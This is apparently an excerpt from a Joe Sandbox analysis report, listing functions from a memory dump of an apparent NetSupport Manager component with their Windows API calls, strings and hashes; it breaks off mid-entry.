                                                                                                                        Function 00AECD50 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 163threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(?,5E06C67B), ref: 00AECD82
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00AECDA2
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00AECE7C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$CurrentEnterLeaveThread
                                                                                                                        • String ID: ..\CTL32\EVMNGR.cpp$bFound
                                                                                                                        • API String ID: 2351996187-1229222698
                                                                                                                        • Opcode ID: b31086f44416222a15238eafd80b34aced04a42e177d6b1e5a7b1d64e3daacaf
                                                                                                                        • Instruction ID: 5bed29b81f660d2c126ece6c2c6602bad878ef6c70ceb10504a88f8339faa987
                                                                                                                        • Opcode Fuzzy Hash: b31086f44416222a15238eafd80b34aced04a42e177d6b1e5a7b1d64e3daacaf
                                                                                                                        • Instruction Fuzzy Hash: 72519D71A042849FCB14CF69C884F6ABBF5FB09320F148599E815DB292C775ED42CB90
                                                                                                                        Function 00B032B0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00B032D0
                                                                                                                          • Part of subcall function 00B614E7: std::exception::exception.LIBCMT ref: 00B614FC
                                                                                                                          • Part of subcall function 00B614E7: __CxxThrowException@8.LIBCMT ref: 00B61511
                                                                                                                          • Part of subcall function 00B614E7: std::exception::exception.LIBCMT ref: 00B61522
                                                                                                                        • _memmove.LIBCMT ref: 00B03357
                                                                                                                        • _memmove.LIBCMT ref: 00B0337B
                                                                                                                        • _memmove.LIBCMT ref: 00B033B5
                                                                                                                        • _memmove.LIBCMT ref: 00B033D1
                                                                                                                        • std::exception::exception.LIBCMT ref: 00B0341B
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B03430
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                                                        • String ID: deque<T> too long
                                                                                                                        • API String ID: 827257264-309773918
                                                                                                                        • Opcode ID: 19c71c8db09592bf8fe141e4e61760951547af09bebf0f29e902f7d66ad413ca
                                                                                                                        • Instruction ID: c71123be0cb6b72f717cc3da991f9753fe09089a7cf4be55090e92c5889ee008
                                                                                                                        • Opcode Fuzzy Hash: 19c71c8db09592bf8fe141e4e61760951547af09bebf0f29e902f7d66ad413ca
                                                                                                                        • Instruction Fuzzy Hash: 2F41B972E00105ABDB14DE68CCC5AAEBBE9DF84710F1DC5A9E805D7385EA74EE01C790
                                                                                                                        Function 00B1C530 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 156COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00B1C596
                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00B1C611
                                                                                                                        • _wcsncat.LIBCMT ref: 00B1C669
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00B1C6DE
                                                                                                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 00B1C6EF
                                                                                                                        • GetOpenFileNameW.COMDLG32(00000058), ref: 00B1C6FE
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00B1C70D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectoryFileName$EnvironmentExpandOpenSaveStrings_memset_wcsncat
                                                                                                                        • String ID: X
                                                                                                                        • API String ID: 3674843827-3081909835
                                                                                                                        • Opcode ID: 4ead68783b87d3ee06a225448aa76fe6777543530b446d163ebb9b57b3452163
                                                                                                                        • Instruction ID: ba3aec567b59832ee4ac80e81a9e77aa413b6826ba50f8fbe38b9c79ffea3864
                                                                                                                        • Opcode Fuzzy Hash: 4ead68783b87d3ee06a225448aa76fe6777543530b446d163ebb9b57b3452163
                                                                                                                        • Instruction Fuzzy Hash: 6C5141B1E402189BDB20DF64DC85BDA77F8EF58310F4041E9EA09A7291EB74AE84CF55
                                                                                                                        Function 00B225F0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 136registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                        • RegCreateKeyW.ADVAPI32(80000002,?,?), ref: 00B22683
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$CreateLocalTime_mallocwvsprintf
                                                                                                                        • String ID: EventMessageFile$RegisterEventLog(%s)$TypesSupported
                                                                                                                        • API String ID: 63935457-324002705
                                                                                                                        • Opcode ID: ec9ca49944f4cdf34ae0923b527cc53d10af785c5289cb53f13db0138af1d53d
                                                                                                                        • Instruction ID: e9e77c26ccc5784679d78bc8868ba2910199aa6e706c2f4bd07984fc2dc3d23e
                                                                                                                        • Opcode Fuzzy Hash: ec9ca49944f4cdf34ae0923b527cc53d10af785c5289cb53f13db0138af1d53d
                                                                                                                        • Instruction Fuzzy Hash: C6419772A00229ABDB20AF689C5ABBB73F8EF44750F0041E5F91ED7291EA745D40CB90
                                                                                                                        Function 00B1EB90 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 130COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: "$NSMFileExists(%s) took %d ms$client32u.ini
                                                                                                                        • API String ID: 0-1321718478
                                                                                                                        • Opcode ID: 30840f1a0d3c36e0e25d52fe9f498c2b6c951be68c2eb6b2e47cd39f53bdc6b4
                                                                                                                        • Instruction ID: b901bbd3db93d10c62420997ac180169f0b641ee353d7f261c5817b5b7488bf3
                                                                                                                        • Opcode Fuzzy Hash: 30840f1a0d3c36e0e25d52fe9f498c2b6c951be68c2eb6b2e47cd39f53bdc6b4
                                                                                                                        • Instruction Fuzzy Hash: 9341BB719042189BCF20DB68DC99BEA73F4EB44710F5046E5FD269B2D1EBB49E84CB90
                                                                                                                        Function 00B2A690 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 124COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B39583: __wfsopen.LIBCMT ref: 00B39590
                                                                                                                        • _fseek.LIBCMT ref: 00B2A6F5
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 00B2A75E
                                                                                                                        • _fprintf.LIBCMT ref: 00B2A76D
                                                                                                                        • _fprintf.LIBCMT ref: 00B2A78A
                                                                                                                          • Part of subcall function 00B2F5E0: LoadStringW.USER32(00AE0000,000003F9,?,00000100), ref: 00B2F60A
                                                                                                                          • Part of subcall function 00B2F5E0: wvsprintfW.USER32(?,?,00000000), ref: 00B2F622
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _fprintf$ByteCharLoadMultiStringWide__wfsopen_fseekwvsprintf
                                                                                                                        • String ID: %s$0x%lx$Written nsm.lic, cks=%x, wrap=%d, product=%d, expiry=%d/%d/%d, start=%d/%d/%d$r+t
                                                                                                                        • API String ID: 2789903038-3235974708
                                                                                                                        • Opcode ID: e4e751f7b953d909c222aa29c2a43ec396b25f8c6b8fa76bbe2af0940d9d3489
                                                                                                                        • Instruction ID: 9ff3ca8e09b9aed5f6880d420f847321ff2bed80fb3ca1dd89e90cebfaea80cb
                                                                                                                        • Opcode Fuzzy Hash: e4e751f7b953d909c222aa29c2a43ec396b25f8c6b8fa76bbe2af0940d9d3489
                                                                                                                        • Instruction Fuzzy Hash: 8031E872A401207BC721BB94AD42F7A37F8EB94B11F14419AFD08672A1EFB46D41C7E6
                                                                                                                        Function 00B2AD60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 123registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,000F003F,?), ref: 00B2AD9A
                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00B2ADDE
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00B2AE79
                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00B2AE81
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00B2AEB6
                                                                                                                          • Part of subcall function 00B2AD60: RegCloseKey.ADVAPI32(?), ref: 00B2AE25
                                                                                                                          • Part of subcall function 00B2AD60: RegOpenKeyExW.ADVAPI32(?,?,00000000,000F003F,?), ref: 00B2AE3B
                                                                                                                        Strings
                                                                                                                        • Delete registry entries for %s, xrefs: 00B2AD7D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$Openwsprintf$DeleteEnumLocalTime_mallocwvsprintf
                                                                                                                        • String ID: Delete registry entries for %s
                                                                                                                        • API String ID: 3685337534-4139843425
                                                                                                                        • Opcode ID: cf46370112e149a1a6154fdd76f0e5f8f6a67e78ed509d185e24c3298eb8a38d
                                                                                                                        • Instruction ID: 52725c93bcac82ca907a6570d02e1c92da21398c9e0bd18b42c739874d5ae227
                                                                                                                        • Opcode Fuzzy Hash: cf46370112e149a1a6154fdd76f0e5f8f6a67e78ed509d185e24c3298eb8a38d
                                                                                                                        • Instruction Fuzzy Hash: F3316676E00228A7C7219B64AC45FEBB7FCEB98710F1001D5FA4D97191DEB49D84CBA1
                                                                                                                        Function 00B1A0F0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 116threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • EAX=%08X EBX=%08X ECX=%08X EDX=%08X ESI=%08XEDI=%08X EBP=%08X ESP=%08X EIP=%08X FLG=%08XCS=%04X DS=%04X SS=%04X ES=%0, xrefs: 00B1A17D
                                                                                                                        • Callstack:, xrefs: 00B1A1E0
                                                                                                                        • %02X , xrefs: 00B1A1C3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$CurrentReadThread
                                                                                                                        • String ID: Callstack:$%02X $EAX=%08X EBX=%08X ECX=%08X EDX=%08X ESI=%08XEDI=%08X EBP=%08X ESP=%08X EIP=%08X FLG=%08XCS=%04X DS=%04X SS=%04X ES=%0
                                                                                                                        • API String ID: 477357799-1804337886
                                                                                                                        • Opcode ID: e87960cddae34ba80ad0e3af0618dea57056d0ec6ef9c0f57b953bf8cf2afc8d
                                                                                                                        • Instruction ID: 4ee68219a678dd66a7354c33146b7df3b4fd813be2f17219a60af9ebe3dc857d
                                                                                                                        • Opcode Fuzzy Hash: e87960cddae34ba80ad0e3af0618dea57056d0ec6ef9c0f57b953bf8cf2afc8d
                                                                                                                        • Instruction Fuzzy Hash: 4C413BB2200606BFDB44CF68DC84F96B7A9BB89744F408258F92DD7251DB30B964CBE1
                                                                                                                        Function 00B0C0F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 101COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InitializeCriticalSection.KERNEL32(00B8B71C,5E06C67B), ref: 00B0C129
                                                                                                                        • std::exception::exception.LIBCMT ref: 00B0C18B
                                                                                                                          • Part of subcall function 00B385A6: std::exception::_Copy_str.LIBCMT ref: 00B385C1
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B0C1A0
                                                                                                                          • Part of subcall function 00B391A1: RaiseException.KERNEL32(00B3367E,00B82978,00000000,?,00B3367E,00B82978,?,00B32ECB,00000000,?,00B3367E,?), ref: 00B391E3
                                                                                                                        • InitializeCriticalSection.KERNEL32(00000000), ref: 00B0C1B1
                                                                                                                        • EnterCriticalSection.KERNEL32(00B8B71C), ref: 00B0C1CD
                                                                                                                        • LeaveCriticalSection.KERNEL32(00B8B71C,?,00000001), ref: 00B0C223
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$Initialize$Copy_strEnterExceptionException@8LeaveRaiseThrowstd::exception::_std::exception::exception
                                                                                                                        • String ID: ..\CTL32\Refcount.cpp$p < ep
                                                                                                                        • API String ID: 4033003751-1059512116
                                                                                                                        • Opcode ID: 22497e083cafb7d7c6f947400f3fbebf0a3db35f00d0d6daa5d861f46de6f71c
                                                                                                                        • Instruction ID: 17498031ad42f5b8b81ddce5526ae0d75d9f09996b80f624666327a10962bc09
                                                                                                                        • Opcode Fuzzy Hash: 22497e083cafb7d7c6f947400f3fbebf0a3db35f00d0d6daa5d861f46de6f71c
                                                                                                                        • Instruction Fuzzy Hash: 6E31A2769003049FDB10DF68C885B5ABFF4FB48B10F1042AAE849A73E1D7B59D04CB95
                                                                                                                        Function 00B14660 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 91libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(?), ref: 00B146C6
                                                                                                                        • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 00B146D8
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00B14714
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00B14731
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$Free$AddressLoadProc
                                                                                                                        • String ID: ..\CTL32\util.cpp$DllGetVersion$pdwMajorVer$pdwMinorVer
                                                                                                                        • API String ID: 1386263645-850731426
                                                                                                                        • Opcode ID: 5c293e1a2a3aa5ccb5aad4e23a1a04dd7bfdebcd2122f560ae6cd2a358cd728b
                                                                                                                        • Instruction ID: a845d5aa81340038b16afe570c63b44223223f74ffcfe604c97e451fc2eec6ec
                                                                                                                        • Opcode Fuzzy Hash: 5c293e1a2a3aa5ccb5aad4e23a1a04dd7bfdebcd2122f560ae6cd2a358cd728b
                                                                                                                        • Instruction Fuzzy Hash: 18316171E0420A9BCB049F99E945ABEB7F4EF48711F1000AEF909A3391DFB459008B95
                                                                                                                        Function 00B22110 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 80COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _fseek.LIBCMT ref: 00B22123
                                                                                                                        • _fseek.LIBCMT ref: 00B22133
                                                                                                                          • Part of subcall function 00B37732: __lock_file.LIBCMT ref: 00B37773
                                                                                                                          • Part of subcall function 00B37732: __fseek_nolock.LIBCMT ref: 00B37784
                                                                                                                        • _malloc.LIBCMT ref: 00B22143
                                                                                                                          • Part of subcall function 00B37CA4: __FF_MSGBANNER.LIBCMT ref: 00B37CBD
                                                                                                                          • Part of subcall function 00B37CA4: __NMSG_WRITE.LIBCMT ref: 00B37CC4
                                                                                                                          • Part of subcall function 00B37CA4: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,75BF73E0,?,00B097EE,00000000,?,?), ref: 00B37CE9
                                                                                                                        • __fread_nolock.LIBCMT ref: 00B22156
                                                                                                                        • _free.LIBCMT ref: 00B221A1
                                                                                                                        • _fseek.LIBCMT ref: 00B221AB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _fseek$AllocateHeap__fread_nolock__fseek_nolock__lock_file_free_malloc
                                                                                                                        • String ID: product.dat$product=
                                                                                                                        • API String ID: 1844859279-1281245283
                                                                                                                        • Opcode ID: feef678c8c4c3fae885085cc74620e13368950e79968e8e80e78942f7a2bd2aa
                                                                                                                        • Instruction ID: f9a33a229522aad1af7af595bc190dfff2778730034064175252ace538ff281e
                                                                                                                        • Opcode Fuzzy Hash: feef678c8c4c3fae885085cc74620e13368950e79968e8e80e78942f7a2bd2aa
                                                                                                                        • Instruction Fuzzy Hash: 9111B9B2A8522477E62066A9AC43F9BB6DCDF41751F6401D5FD0CE7242EA25DE1082E1
                                                                                                                        Function 00B4C907 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • UnDecorator::getArgumentList.LIBCMT ref: 00B4C92C
                                                                                                                          • Part of subcall function 00B4C4C7: Replicator::operator[].LIBCMT ref: 00B4C54A
                                                                                                                          • Part of subcall function 00B4C4C7: DName::operator+=.LIBCMT ref: 00B4C552
                                                                                                                        • DName::operator+.LIBCMT ref: 00B4C985
                                                                                                                        • DName::DName.LIBCMT ref: 00B4C9DD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                                                                                                                        • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                                        • API String ID: 834187326-2211150622
                                                                                                                        • Opcode ID: 58ea355cbb686eae24a28ec64637a50e54f5188d5478445c5cf73a65c6f7683c
                                                                                                                        • Instruction ID: 6bfd2e672e8c5d727a1d5da1f0f69b521dcf8b2a45872f1082d9071c32788596
                                                                                                                        • Opcode Fuzzy Hash: 58ea355cbb686eae24a28ec64637a50e54f5188d5478445c5cf73a65c6f7683c
